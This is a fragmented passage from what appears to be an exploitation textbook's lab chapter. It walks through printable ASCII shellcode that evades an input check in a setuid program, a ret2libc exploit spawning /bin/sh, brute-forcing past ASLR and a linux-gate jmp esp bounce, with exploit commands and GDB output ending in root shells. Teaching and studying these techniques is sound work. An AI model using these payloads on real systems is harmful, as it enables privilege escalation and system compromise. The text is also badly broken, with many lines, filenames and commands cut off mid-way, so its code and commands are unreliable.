Despite the vulnerability, the code does make an attempt at security
...
In addition, the unused
environment variables and program arguments are cleared out for security
reasons
...

reader@hacking:~/booksrc $ gcc -o update_info update_info
...
/update_info
reader@hacking:~/booksrc $ sudo chmod u+s
...
/update_info
Usage:
...
/update_info OCP209 "Enforcement Droid"
[DEBUG]: description is at 0xbffff650
Updating product #OCP209 with description 'Enforcement Droid'
reader@hacking:~/booksrc $
reader@hacking:~/booksrc $
...
/update_info $(perl -e 'print "\xf2\xf9\xff\xbf"x10') $(cat
...
bin)
Fatal: description argument can only contain printable bytes
reader@hacking:~/booksrc $

This output shows a sample usage and then tries to exploit the vulnerable
strcpy() call
...
However, this buffer is checked for nonprintable bytes
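The kind of check that rejects the exploit buffer can be sketched as follows. This is an illustrative helper with a hypothetical name, not the code from update_info; unlike the loop in the listing, which stops one byte short of the end, it tests every byte of the string.

```c
#include <ctype.h>
#include <stddef.h>

/* Return 1 if every byte of s is printable, otherwise 0. */
int all_printable(const char *s) {
    for (size_t i = 0; s[i] != '\0'; i++)
        if (!isprint((unsigned char)s[i]))
            return 0;
    return 1;
}
```

A description such as "Enforcement Droid" passes, while any buffer containing raw address or shellcode bytes like 0xf2 or 0xbf fails.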
...

reader@hacking:~/booksrc $ gdb -q
...
so
...

0xbffff9cb in ?? ()
(gdb) i r eip
eip 0xbffff9cb 0xbffff9cb
(gdb) x/s $eip
0xbffff9cb: "blah"
(gdb)

The printable input validation is the only thing stopping exploitation
...
And while it's
not possible to avoid this check, there are ways to smuggle illicit data past the
guards
...
The encoding
shellcode from the previous section is technically polymorphic, since it modifies
the string it uses while it's running
...
There are other instructions that fall into this
printable range (from 0x20 to 0x7e); however, the total set is actually rather
small
...

Trying to write complex shellcode with such a limited instruction set would simply
be masochistic, so instead, the printable shellcode will use simple methods to
build more complex shellcode on the stack
...

The first step is figuring out a way to zero out registers
...
One option is to use the AND bitwise operation, which assembles
into the percent character (%) when using the EAX register
...

An AND operation transforms bits as follows:
1 and 1 = 1
0 and 0 = 0
1 and 0 = 0
0 and 1 = 0

Since the only case where the result is 1 is when both bits are 1, if two inverse
values are ANDed onto EAX, EAX will become zero
...

and eax, 0x454e4f4a ; Assembles into %JONE
and eax, 0x3a313035 ; Assembles into %501:

So %JONE%501: in machine code will zero out the EAX register
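The two claims here, that the pair of masks clears any value and that the instructions assemble to printable text, can be checked with a short C sketch. The names are hypothetical; the encoding assumes the one-byte 0x25 opcode for and eax, imm32 followed by the immediate in little-endian order.

```c
#include <stdint.h>

#define AND_MASK_1 0x454e4f4au
#define AND_MASK_2 0x3a313035u

/* Apply both AND masks; no bit is set in both, so the result is always 0. */
uint32_t zero_with_and(uint32_t eax) {
    eax &= AND_MASK_1;
    eax &= AND_MASK_2;
    return eax;
}

/* Encode "and eax, imm32" as opcode 0x25 ('%') plus the little-endian
 * immediate. out receives five bytes and a terminating null. */
void encode_and_eax(uint32_t imm, char out[6]) {
    out[0] = 0x25;
    for (int i = 0; i < 4; i++)
        out[1 + i] = (char)((imm >> (8 * i)) & 0xff);
    out[5] = '\0';
}
```

Whatever EAX held beforehand, zero_with_and returns 0, and the two encoded instructions come out as the strings %JONE and %501:.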
...
Some
other instructions that assemble into printable ASCII characters are shown in the
box below
...
The general technique is, first, to set ESP back behind the executing
loader code (in higher memory addresses), and then to build the shellcode from
end to start by pushing values onto the stack, as shown here
...
Eventually, EIP and ESP
will meet up, and the EIP will continue executing into the freshly built shellcode
...

First, ESP must be set behind the printable loader shellcode
...
The
ESP register must be moved so it's after the loader code, while still leaving room
for the new shellcode and for the loader shellcode itself
...
This value doesn't need to be exact, since provisions will
be made later to allow for some slop
...
The register only has 32 bits of space, so adding 860 to a
register is the same as subtracting 2^32 - 860, or 4,294,966,436, from it
...

sub eax, 0x39393333 ; Assembles into -3399
sub eax, 0x72727550 ; Assembles into -Purr
sub eax, 0x54545421 ; Assembles into -!TTT

As the GDB output confirms, subtracting these three values from a 32-bit number
is the same as adding 860 to it
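The wraparound arithmetic can be reproduced with unsigned 32-bit integers in C, which wrap modulo 2^32 the same way the register does. The function name is hypothetical.

```c
#include <stdint.h>

/* Subtract three values from a 32-bit register value, wrapping modulo 2^32. */
uint32_t sub3(uint32_t eax, uint32_t a, uint32_t b, uint32_t c) {
    eax -= a;
    eax -= b;
    eax -= c;
    return eax;
}
```

The three printable values sum to 0xfffffca4, which is 2^32 - 860, so sub3(0, 0x39393333, 0x72727550, 0x54545421) returns 860, and applying the same subtractions to an ESP of 0xbffff6d0 gives 0xbffffa2c.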
...
So the current value of
ESP must be moved into EAX for the subtraction, and then the new value of EAX
must be moved back into ESP
...
By pushing the
value from the source register to the stack and then popping it off into the
destination register, the equivalent of a mov dest, source instruction can be
accomplished with push source and pop dest
...

Here is the final set of instructions to add 860 to ESP
...
So
far, so good
...

First, EAX must be zeroed out; this is easy now that a method has been
discovered
...
Since the stack normally
grows upward (toward lower memory addresses) and builds with a FILO
ordering, the first value pushed to the stack must be the last four bytes of the
shellcode
...
The following output shows a hexadecimal dump of the standard
shellcode used in the previous chapters, which will be built by the printable loader
code
...
/shellcode
...
1
...
j
...
Q
...
|
00000020 e1 cd 80 |
...
This is easy to do by using sub instructions to wrap the
value around
...
This moves ESP up (toward
lower memory addresses) to the end of the newly pushed value, ready for the next
four bytes of shellcode (shown in italic in the preceding shellcode)
...
As this process is repeated for each four-byte chunk, the
shellcode is built from end to start, toward the executing loader code
...
1
...
j
...
Q
...
|
00000020 e1 cd 80 |
...
This situation is alleviated by inserting one single-byte NOP instruction
at the beginning of the code, resulting in the value 0x31c03190 being pushed to
the stack (0x90 is the machine code for NOP)
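To see which values the loader has to push, and in what order, the NOP-padded shellcode can be cut into little-endian words from the end backward. This is a minimal sketch with hypothetical names; the byte array is the standard 35-byte shellcode used in this chapter with one 0x90 prepended.

```c
#include <stddef.h>
#include <stdint.h>

/* Standard shellcode padded with one leading NOP to reach 36 bytes. */
static const uint8_t PADDED_SHELLCODE[36] = {
    0x90, 0x31, 0xc0, 0x31, 0xdb, 0x31, 0xc9, 0x99, 0xb0, 0xa4, 0xcd, 0x80,
    0x6a, 0x0b, 0x58, 0x51, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62,
    0x69, 0x6e, 0x89, 0xe3, 0x51, 0x89, 0xe2, 0x53, 0x89, 0xe1, 0xcd, 0x80
};

/* Write the 32-bit words of code into out in push order (last word first).
 * Returns the number of words, or 0 if len is not a multiple of four. */
size_t push_order_words(const uint8_t *code, size_t len, uint32_t *out) {
    if (len % 4 != 0)
        return 0;
    size_t n = 0;
    for (size_t pos = len; pos >= 4; pos -= 4) {
        const uint8_t *p = code + pos - 4;
        out[n++] = (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
                   ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
    }
    return n;
}
```

For this input the first word to push is 0x80cde189, the second is 0x53e28951, and the ninth and last is 0x31c03190.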
...
The following source code is a
program to help calculate the necessary printable values
...
c
#include ...
h>
#include ...
h>
#include ...
h>
#define CHR "%_01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-"
int main(int argc, char* argv[])
{
unsigned int targ, last, t[4], l[4];
unsigned int try, single, carry=0;
int len, a, i, j, k, m, z, flag=0;
char word[3][4];
unsigned char mem[70];
if(argc < 3) { // Both the starting and end values are required
printf("Usage: %s <EAX starting value> <EAX end value>\n", argv[0]);
exit(1);
}
srand(time(NULL));
bzero(mem, 70);
strcpy(mem, CHR);
len = strlen(mem);
strfry(mem); // Randomize
last = strtoul(argv[1], NULL, 0);
targ = strtoul(argv[2], NULL, 0);
printf("calculating printable values to subtract from EAX
...
For the printable loader shellcode, EAX is zeroed out to start with, and
the end value should be 0x80cde189
...
bin
...
c
reader@hacking:~/booksrc $
...

start: 0x00000000
     - 0x346d6d25
     - 0x256d6d25
     - 0x2557442d
-------------------
end:   0x80cde189
reader@hacking:~/booksrc $ hexdump -C
...
bin
00000000 31 c0 31 db 31 c9 99 b0 a4 cd 80 6a 0b 58 51 68 |1
...
1
...
XQh|
00000010 2f 2f 73 68 68 2f 62 69 6e 89 e3 51 89 e2 53 89 |//shh/bin
...
S
...
|
00000023
reader@hacking:~/booksrc $
...

start: 0x80cde189
     - 0x59316659
     - 0x59667766
     - 0x7a537a79
-------------------
end:   0x53e28951
reader@hacking:~/booksrc $

The output above shows the printable values needed to wrap the zeroed EAX
register around to 0x80cde189 (shown in bold)
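Each value the helper prints must consist only of bytes from the allowed character set. A small C check for that property might look like this; the function name is hypothetical, and CHR is copied from the helper program's source.

```c
#include <stdint.h>
#include <string.h>

#define CHR "%_01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-"

/* Return 1 if all four bytes of value appear in CHR, otherwise 0. */
int word_is_printable(uint32_t value) {
    for (int i = 0; i < 4; i++) {
        unsigned char byte = (unsigned char)((value >> (8 * i)) & 0xff);
        /* strchr also matches the terminating null, so reject 0 explicitly. */
        if (byte == 0 || strchr(CHR, byte) == NULL)
            return 0;
    }
    return 1;
}
```

The three subtracted values 0x346d6d25, 0x256d6d25 and 0x2557442d all pass this check, while the target 0x80cde189 does not, which is why it has to be reached indirectly through subtraction.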
...
This process is repeated until all the shellcode is built
...

printable
...

sub eax,0x39393333 ; Subtract printable values
sub eax,0x72727550 ; to add 860 to EAX
...

pop esp ; Effectively ESP = ESP + 860
and eax,0x454e4f4a
and eax,0x3a313035 ; Zero out EAX
...

sub eax,0x2557442d ; (last 4 bytes from shellcode
...

sub eax,0x59316659 ; Subtract more printable values

sub eax,0x59667766 ; to make EAX = 0x53e28951
...

push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax

At the end, the shellcode has been built somewhere after the loader code, most
likely leaving a gap between the newly built shellcode and the executing loader
code
...

Once again, sub instructions are used to set EAX to 0x90909090, and EAX is
repeatedly pushed to the stack
...
Eventually, these NOP instructions
will build right over the executing push instructions of the loader code, allowing
the EIP and program execution to flow over the sled into the shellcode
...

reader@hacking:~/booksrc $ nasm printable
...
/printable)
TX-3399-Purr-!TTTP\%JONE%501:-%mm4-%mm%--DW%P-Yf1Y-fwfY-yzSzP-iii%-Zkx%-%Fw%P-XXn6-99w%
-ptt%P%w%%-qqqq-jPiXP-cccc-Dw0D-WICzP-c66c-W0TmP-TTTT-%NN0-%o42-7a-0P-xGGx-rrrx-aFOwP-pApA-N-w-B2H2PPPPPPPPPPPPPPPPPPPPPP
reader@hacking:~/booksrc $

This printable ASCII shellcode can now be used to smuggle the actual shellcode
past the input-validation routine of the update_info program
...
/update_info $(perl -e 'print "AAAA"x10') $(cat
...
/update_info $(perl -e 'print "\x10\xf9\xff\xbf"x10') $(cat
...
2# whoami
root
sh-3
...
In case you weren't able to follow everything that just happened there, the
output below watches the execution of the printable shellcode in GDB
...

reader@hacking:~/booksrc $ gdb -q
...
so
...

(gdb) disass update_product_description
Dump of assembler code for function update_product_description:
0x080484a8 : push ebp
0x080484a9 : mov ebp,esp
0x080484ab : sub esp,0x28
0x080484ae : mov eax,DWORD PTR [ebp+8]
0x080484b1 : mov DWORD PTR [esp+4],eax
0x080484b5 : lea eax,[ebp-24]
0x080484b8 : mov DWORD PTR [esp],eax
0x080484bb : call 0x8048388
0x080484c0 : mov eax,DWORD PTR [ebp+12]
0x080484c3 : mov DWORD PTR [esp+8],eax
0x080484c7 : lea eax,[ebp-24]
0x080484ca : mov DWORD PTR [esp+4],eax
0x080484ce : mov DWORD PTR [esp],0x80487a0
0x080484d5 : call 0x8048398
0x080484da : leave
0x080484db : ret
End of assembler dump
...
c, line 21
...
/printable)
Starting program: /home/reader/booksrc/update_info $(perl -e 'print "AAAA"x10') $(cat
...

0xb7f06bfb in strlen () from /lib/tls/i686/cmov/libc
...
6
(gdb) run $(perl -e 'print "\xfd\xf8\xff\xbf"x10') $(cat
...

Start it from the beginning? (y or n) y
Starting program: /home/reader/booksrc/update_info $(perl -e 'print "\xfd\xf8\xff\xbf"
x10')
$(cat
...
c:21
21 }
(gdb) stepi
0xbffff8fd in ?? ()
(gdb) x/9i $eip
0xbffff8fd: push esp
0xbffff8fe: pop eax
0xbffff8ff: sub eax,0x39393333
0xbffff904: sub eax,0x72727550
0xbffff909: sub eax,0x54545421
0xbffff90e: push eax
0xbffff90f: pop esp
0xbffff910: and eax,0x454e4f4a
0xbffff915: and eax,0x3a313035
(gdb) i r esp
esp 0xbffff6d0 0xbffff6d0
(gdb) p /x $esp + 860
$1 = 0xbffffa2c
(gdb) stepi 9
0xbffff91a in ?? ()
(gdb) i r esp eax
esp 0xbffffa2c 0xbffffa2c
eax 0x0 0
(gdb)

The first nine instructions add 860 to ESP and zero out the EAX register. The next
eight instructions push the last eight bytes of the shellcode to the stack in
four-byte chunks
...

(gdb) x/8i $eip
0xbffff91a: sub eax,0x346d6d25
0xbffff91f: sub eax,0x256d6d25
0xbffff924: sub eax,0x2557442d
0xbffff929: push eax
0xbffff92a: sub eax,0x59316659
0xbffff92f: sub eax,0x59667766
0xbffff934: sub eax,0x7a537a79
0xbffff939: push eax
(gdb) stepi 8
0xbffff93a in ?? ()
(gdb) x/4x $esp
0xbffffa24: 0x53e28951 0x80cde189 0x00000000 0x00000000
(gdb) stepi 32
0xbffff9ba in ?? ()
(gdb) x/5i $eip
0xbffff9ba: push eax
0xbffff9bb: push eax
0xbffff9bc: push eax
0xbffff9bd: push eax
0xbffff9be: push eax
(gdb) x/16x $esp
0xbffffa04: 0x90909090 0x31c03190 0x99c931db 0x80cda4b0
0xbffffa14: 0x51580b6a 0x732f2f68 0x622f6868 0xe3896e69
0xbffffa24: 0x53e28951 0x80cde189 0x00000000 0x00000000
0xbffffa34: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) i r eip esp eax
eip 0xbffff9ba 0xbffff9ba
esp 0xbffffa04 0xbffffa04
eax 0x90909090 -1869574000
(gdb)

Now with the shellcode completely constructed on the stack, EAX is set to
0x90909090
...

(gdb) x/24x 0xbffff9ba
0xbffff9ba: 0x50505050 0x50505050 0x50505050 0x50505050
0xbffff9ca: 0x50505050 0x00000050 0x00000000 0x00000000
0xbffff9da: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff9ea: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff9fa: 0x00000000 0x00000000 0x90900000 0x31909090
0xbffffa0a: 0x31db31c0 0xa4b099c9 0x0b6a80cd 0x2f685158
(gdb) stepi 10
0xbffff9c4 in ?? ()
(gdb) x/24x 0xbffff9ba
0xbffff9ba: 0x50505050 0x50505050 0x50505050 0x50505050
0xbffff9ca: 0x50505050 0x00000050 0x00000000 0x00000000
0xbffff9da: 0x90900000 0x90909090 0x90909090 0x90909090
0xbffff9ea: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff9fa: 0x90909090 0x90909090 0x90909090 0x31909090
0xbffffa0a: 0x31db31c0 0xa4b099c9 0x0b6a80cd 0x2f685158
(gdb) stepi 5
0xbffff9c9 in ?? ()
(gdb) x/24x 0xbffff9ba
0xbffff9ba: 0x50505050 0x50505050 0x50505050 0x90905050
0xbffff9ca: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff9da: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff9ea: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff9fa: 0x90909090 0x90909090 0x90909090 0x31909090
0xbffffa0a: 0x31db31c0 0xa4b099c9 0x0b6a80cd 0x2f685158
(gdb)

Now the execution pointer (EIP) can flow over the NOP bridge into the
constructed shellcode
...
It and all the other
techniques we discussed are just building blocks that can be used in a myriad of
different combinations
...
Be
clever and beat them at their own game
...
It
was only a matter of time for programmers to come up with some clever
protection methods
...

Nonexecutable Stack
Most applications never need to execute anything on the stack, so an obvious
defense against buffer overflow exploits is to make the stack nonexecutable
...
This
type of defense will stop the majority of exploits out there, and it is becoming
more popular
...

ret2libc
Of course, there exists a technique used to bypass this protective
countermeasure
...
libc is a standard C
library that contains various basic functions, such as printf() and exit()
...
An exploit can do the exact same
thing and direct a program's execution into a certain function in libc
...
However, nothing is
ever executed on the stack
...
As you recall, this
function takes a single argument and executes that argument with /bin/sh
...
For this
example, a simple vulnerable program will be used
...
c
int main(int argc, char *argv[])
{
char buffer[5];
strcpy(buffer, argv[1]);
return 0;
}

Of course, this program must be compiled and setuid root before it's truly
vulnerable
...
c
reader@hacking:~/booksrc $ sudo chown root
...
/vuln
reader@hacking:~/booksrc $ ls -l
...
/vuln

reader@hacking:~/booksrc $

The general idea is to force the vulnerable program to spawn a shell, without
executing anything on the stack, by returning into the libc function system()
...

First, the location of the system() function in libc must be determined
...
One of the easiest ways to find the location of a libc
function is to create a simple dummy program and debug it, like this:
reader@hacking:~/booksrc $ cat > dummy
...
c
reader@hacking:~/booksrc $ gdb -q
...
so
...

(gdb) break main
Breakpoint 1 at 0x804837a
(gdb) run
Starting program: /home/matrix/booksrc/dummy
Breakpoint 1, 0x0804837a in main ()
(gdb) print system
$1 = {} 0xb7ed0d80
(gdb) quit

Here, a dummy program is created that uses the system() function
...
The program is executed, and then the location of the system()
function is displayed
...

Armed with that knowledge, we can direct program execution into the system()
function of libc
...

When returning into libc, the return address and function arguments are read off
the stack in what should be a familiar format: the return address followed by the
arguments
...

Directly after the address of the desired libc function is the address to which
execution should return after the libc call
...

In this case, it doesn't really matter where the execution returns to after the libc
call, since it will be opening an interactive shell
...
There is only one argument, which should be a
pointer to the string /bin/sh
...
In the output below, the string is
prefixed with several spaces
...

reader@hacking:~/booksrc $ export BINSH=" /bin/sh"
reader@hacking:~/booksrc $
...
/vuln
BINSH will be at 0xbffffe5b
reader@hacking:~/booksrc $

So the system() address is 0xb7ed0d80, and the address for the /bin/sh string
will be 0xbffffe5b when the program is executed
...

A quick binary search shows that the return address is probably overwritten by
the eighth word of the program input, so seven words of dummy data are used for
spacing in the exploit
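The layout described above (padding, function address, return address, argument) can be sketched as a buffer builder in C. The function names are hypothetical, and the addresses in the usage note are the ones found in this section; they only hold for that particular machine with a non-randomized layout.

```c
#include <stddef.h>
#include <stdint.h>

/* Store a 32-bit value in little-endian byte order; returns bytes written. */
static size_t put_le32(uint8_t *out, uint32_t v) {
    for (int i = 0; i < 4; i++)
        out[i] = (uint8_t)((v >> (8 * i)) & 0xff);
    return 4;
}

/* Lay out: pad_words of "ABCD", then the libc function address, the address
 * to return to after the call, and the single argument. Returns the length.
 * out must have room for (pad_words + 3) * 4 bytes. */
size_t build_ret2libc(uint8_t *out, size_t pad_words, uint32_t func_addr,
                      uint32_t return_addr, uint32_t arg_addr) {
    size_t n = 0;
    for (size_t i = 0; i < pad_words; i++)
        n += put_le32(out + n, 0x44434241u); /* "ABCD" */
    n += put_le32(out + n, func_addr);
    n += put_le32(out + n, return_addr);
    n += put_le32(out + n, arg_addr);
    return n;
}
```

Called with seven padding words, 0xb7ed0d80 for system(), the placeholder bytes "FAKE" (0x454b4146) as the return address, and 0xbffffe5b for the /bin/sh string, this produces a 40-byte buffer whose eighth word overwrites the saved return address.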
...
/vuln $(perl -e 'print "ABCD"x5')
reader@hacking:~/booksrc $
...
/vuln $(perl -e 'print "ABCD"x8')
Segmentation fault
reader@hacking:~/booksrc $
...
/vuln $(perl -e 'print "ABCD"x7
...
2# whoami
root
sh-3
...
The
return address of FAKE used in the example can be changed to direct program
execution
...

Randomized Stack Space
Another protective countermeasure tries a slightly different approach
...
When the memory layout is randomized, the attacker won't be
able to return execution into waiting shellcode, since he won't know where it is
...
6
...
To turn this
protection on again, echo 1 to the /proc filesystem as shown below
...
c
reader@hacking:~/booksrc $
...
out
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]------
reader@hacking:~/booksrc $

With this countermeasure turned on, the notesearch exploit no longer works,
since the layout of the stack is randomized
...
The following example demonstrates this
...
c
#include ...
However, with
ASLR turned on, exploitation isn't that easy
...
c
reader@hacking:~/booksrc $
...
/aslr_demo
buffer is at 0xbfe4de20
reader@hacking:~/booksrc $
...
/aslr_demo $(perl -e 'print "ABCD"x20')
buffer is at 0xbf9a4920
Segmentation fault
reader@hacking:~/booksrc $

Notice how the location of the buffer on the stack changes with every run
...
The randomization changes the
location of everything on the stack, including environment variables
...
bin)
reader@hacking:~/booksrc $
...
/aslr_demo
SHELLCODE will be at 0xbfd919c3
reader@hacking:~/booksrc $
...
/aslr_demo
SHELLCODE will be at 0xbfe499c3
reader@hacking:~/booksrc $
...
/aslr_demo
SHELLCODE will be at 0xbfcae9c3
reader@hacking:~/booksrc $

This type of protection can be very effective in stopping exploits by the average
attacker, but it isn't always enough to stop a determined hacker
...
When a program exits, the value returned from the main function is
the exit status
...

reader@hacking:~/booksrc $
...
/aslr_demo $(perl -e 'print "AAAA"x50')
buffer is at 0xbfbe2ac0
Segmentation fault
reader@hacking:~/booksrc $ echo $?
139
reader@hacking:~/booksrc $
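The status of 139 follows the BASH convention of reporting 128 plus the signal number when a process is killed by a signal. A minimal C sketch of that decoding, with a hypothetical function name:

```c
#include <signal.h>

/* Decode a BASH exit status: values above 128 mean "killed by signal
 * (status - 128)". Returns the signal number, or 0 for a normal exit. */
int signal_from_shell_status(int status) {
    return (status > 128) ? status - 128 : 0;
}
```

Here 139 - 128 = 11, which is SIGSEGV on Linux and matches the segmentation fault shown above, while an ordinary exit status such as 1 decodes to no signal.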

Using BASH's if statement logic, we can stop our brute-forcing script when it
crashes the target
...
The break
statement tells the script to break out of the for loop
...
/aslr_demo $(perl -e "print 'AAAA'x$i")
> if [ $? != 1 ]
> then
> echo "==> Correct offset to return address is $i words"
> break

> fi
> done
Trying offset of 1 words
buffer is at 0xbfc093b0
Trying offset of 2 words
buffer is at 0xbfd01ca0
Trying offset of 3 words
buffer is at 0xbfe45de0
Trying offset of 4 words
buffer is at 0xbfdcd560
Trying offset of 5 words
buffer is at 0xbfbf5380
Trying offset of 6 words
buffer is at 0xbffce760
Trying offset of 7 words
buffer is at 0xbfaf7a80
Trying offset of 8 words
buffer is at 0xbfa4e9d0
Trying offset of 9 words
buffer is at 0xbfacca50
Trying offset of 10 words
buffer is at 0xbfd08c80
Trying offset of 11 words
buffer is at 0xbff24ea0
Trying offset of 12 words
buffer is at 0xbfaf9a70
Trying offset of 13 words
buffer is at 0xbfe0fd80
Trying offset of 14 words
buffer is at 0xbfe03d70
Trying offset of 15 words
buffer is at 0xbfc2fb90
Trying offset of 16 words
buffer is at 0xbff32a40
Trying offset of 17 words
buffer is at 0xbf9da940
Trying offset of 18 words
buffer is at 0xbfd0cc70
Trying offset of 19 words
buffer is at 0xbf897ff0
Illegal instruction
==> Correct offset to return address is 19 words
reader@hacking:~/booksrc $

Knowing the proper offset will let us overwrite the return address
...
Using GDB, let's
look at the program just as it's about to return from the main function
...
/aslr_demo
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...

(gdb) break *0x080483fa
Breakpoint 1 at 0x80483fa: file aslr_demo
...

(gdb)

The breakpoint is set at the last instruction of main
...
When an exploit overwrites the return
address, this is the last instruction where the original program has control
...

(gdb) run
Starting program: /home/reader/booksrc/aslr_demo
buffer is at 0xbfa131a0

Breakpoint 1, 0x080483fa in main (argc=134513588, argv=0x1) at aslr_demo
...

Start it from the beginning? (y or n) y
Starting program: /home/reader/booksrc/aslr_demo
buffer is at 0xbfd8e520
Breakpoint 1, 0x080483fa in main (argc=134513588, argv=0x1) at aslr_demo
...

Start it from the beginning? (y or n) y
Starting program: /home/reader/booksrc/aslr_demo
buffer is at 0xbfaada40
Breakpoint 1, 0x080483fa in main (argc=134513588, argv=0x1) at aslr_demo
...
This makes sense, since the stack
pointer points to the stack and the buffer is on the stack
...

GDB's stepi command steps the program forward in execution by a single
instruction
...

(gdb) run
The program being debugged has been started already
...
c:12
12 }
(gdb) i r esp
esp 0xbfd1ccfc 0xbfd1ccfc
(gdb) stepi
0xb7e4debc in __libc_start_main () from /lib/tls/i686/cmov/libc
...
6
(gdb) i r esp
esp 0xbfd1cd00 0xbfd1cd00
(gdb) x/24x 0xbfd1ccb0
0xbfd1ccb0: 0x00000000 0x080495cc 0xbfd1ccc8 0x08048291
0xbfd1ccc0: 0xb7f3d729 0xb7f74ff4 0xbfd1ccf8 0x08048429
0xbfd1ccd0: 0xb7f74ff4 0xbfd1cd8c 0xbfd1ccf8 0xb7f74ff4
0xbfd1cce0: 0xb7f937b0 0x08048410 0x00000000 0xb7f74ff4
0xbfd1ccf0: 0xb7f9fce0 0x08048410 0xbfd1cd58 0xb7e4debc
0xbfd1cd00: 0x00000001 0xbfd1cd84 0xbfd1cd8c 0xb7fa0898
(gdb) p 0xbfd1cd00 - 0xbfd1ccb0
$1 = 80
(gdb) p 80/4
$2 = 20
(gdb)

Single stepping shows that the ret instruction increases the value of ESP by 4
...
Since the return
address's offset was 19 words, this means that after main's final ret instruction,
ESP points to stack memory found directly after the return address
...

Bouncing Off linux-gate

The technique described below doesn't work with Linux kernels starting from
2
...
18
...
The kernel used in the included LiveCD is 2
...
20, so the
output below is from the machine loki, which is running a 2
...
17 Linux kernel
...

linux-gate refers to a shared object, exposed by the kernel, which looks
like a shared library
...
Do you notice anything interesting about the linux-gate library in
the output below?
matrix@loki /hacking $ uname -a
Linux hacking 2
...
17 #2 SMP Sun Apr 11 03:42:05 UTC 2007 i686 GNU/Linux
matrix@loki /hacking $ cat /proc/sys/kernel/randomize_va_space
1
matrix@loki /hacking $ ldd
...
This is a virtual dynamically shared object used by
the kernel to speed up system calls, which means it's needed in every process
...

The important thing is that every process has a block of memory containing linux-gate's instructions, which are always at the same location, even with ASLR
...
This instruction will jump EIP to where ESP is pointing
...

matrix@loki /hacking $ cat > jmpesp
...
s
matrix@loki /hacking $ hexdump -C jmpesp
00000000 ff e4 |
...

find_jmpesp
...
This can be further verified using GDB:
matrix@loki /hacking $
...
/aslr_demo
Using host libthread_db library "/lib/libthread_db
...
1"
...
c, line 7
...
c:7
7 printf("buffer is at %p\n", &buffer);
(gdb) x/i 0xffffe777
0xffffe777: jmp esp
(gdb)
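Searching a block of memory for the two-byte jmp esp pattern (ff e4) amounts to a simple scan. The sketch below works on a caller-supplied buffer and uses a hypothetical function name; it is not the book's find_jmpesp program, which is not shown in this excerpt.

```c
#include <stddef.h>
#include <stdint.h>

/* Return the offset of the first "jmp esp" (bytes ff e4) in mem,
 * or -1 if the pattern does not occur. */
long find_jmp_esp(const uint8_t *mem, size_t len) {
    for (size_t i = 0; i + 1 < len; i++)
        if (mem[i] == 0xff && mem[i + 1] == 0xe4)
            return (long)i;
    return -1;
}
```

Adding the returned offset to the base address of the scanned region gives the absolute address to use as the return address. The bytes do not need to be an intended instruction in the original code, they only need to sit at a fixed, executable location.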

Putting it all together, if we overwrite the return address with the address
0xffffe777, then execution will jump into linux-gate when the main function
returns
...
From our previous
debugging, we know that at the end of the main function, ESP is pointing to
memory directly after the return address
...

matrix@loki /hacking $ sudo chown root:root
...
/aslr_demo
matrix@loki /hacking $
...
bin)
buffer is at 0xbf8d9ae0
sh-3
...

matrix@loki /hacking $ for i in `seq 1 50`; do
...
/notesearch $(perl -e 'print "\x77\xe7\xff\xff"x35')$(cat
scode
...
/notesearch $(perl -e 'print "\x77\xe7\xff\xff"x36')$(cat
scode2
...
1#

The initial estimate of 35 words was off, since the program still crashed with the
slightly smaller exploit buffer
...

Sure, bouncing off linux-gate is a slick trick, but it only works with older Linux
kernels
...
6
...

reader@hacking:~/booksrc $ uname -a
Linux hacking 2
...
20-15-generic #2 SMP Sun Apr 15 07:36:31 UTC 2007 i686 GNU/Linux
reader@hacking:~/booksrc $ gcc -o find_jmpesp find_jmpesp
...
/find_jmpesp
reader@hacking:~/booksrc $ gcc -g -o aslr_demo aslr_demo
...
/aslr_demo test
buffer is at 0xbfcf3480
reader@hacking:~/booksrc $
...
bin)
reader@hacking:~/booksrc $
...
/aslr_demo
SHELLCODE will be at 0xbfc8d9c3
reader@hacking:~/booksrc $
...
/aslr_demo
SHELLCODE will be at 0xbfa0c9c3
reader@hacking:~/booksrc $

Without the jmp esp instruction at a predictable address, there is no easy way to
bounce off of linux-gate
...
The state of computer security
is a constantly changing landscape, and specific vulnerabilities are discovered and
patched every day
...
Like LEGO bricks, these techniques can be used in
millions of different combinations and configurations
...
With this
understanding comes the wisdom to guesstimate offsets and recognize memory
segments by their address ranges
...
Hopefully, you have a few bypass ideas you
might want to try out now
...
There are probably several ways to bypass ASLR, and you
may invent a new technique
...
But it's worthwhile to think about this problem a little
on your own before reading ahead
...
My first thought was to leverage the
execl() family of functions
...

EXEC(3) Linux Programmer's Manual
NAME
execl, execlp, execle, execv, execvp - execute a file
SYNOPSIS
#include ...
);
int execlp(const char *file, const char *arg,
...
, char * const envp[]);
int execv(const char *path, char *const argv[]);
int execvp(const char *file, char *const argv[]);
DESCRIPTION
The exec() family of functions replaces the current process
image with a new process image
...
(See the
manual page for execve() for detailed information about the
replacement of the current process
...
Let's test this hypothesis with a piece of code
that prints the address of a stack variable and then executes aslr_demo using an
execl() function
...
c
#include ...
h>
int main(int argc, char *argv[]) {
int stack_var;
// Print an address from the current stack frame
...

execl("
...
This lets us compare the
memory layouts
...
c
reader@hacking:~/booksrc $ gcc -o aslr_execl aslr_execl
...
/aslr_demo test
buffer is at 0xbf9f31c0
reader@hacking:~/booksrc $
...
/aslr_execl
stack_var is at 0xbf832044
buffer is at 0xbf832000
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbf832044 - 0xbf832000"
$1 = 68
reader@hacking:~/booksrc $
...
/aslr_execl
stack_var is at 0xbfbb0bc4
buffer is at 0xbff3e710
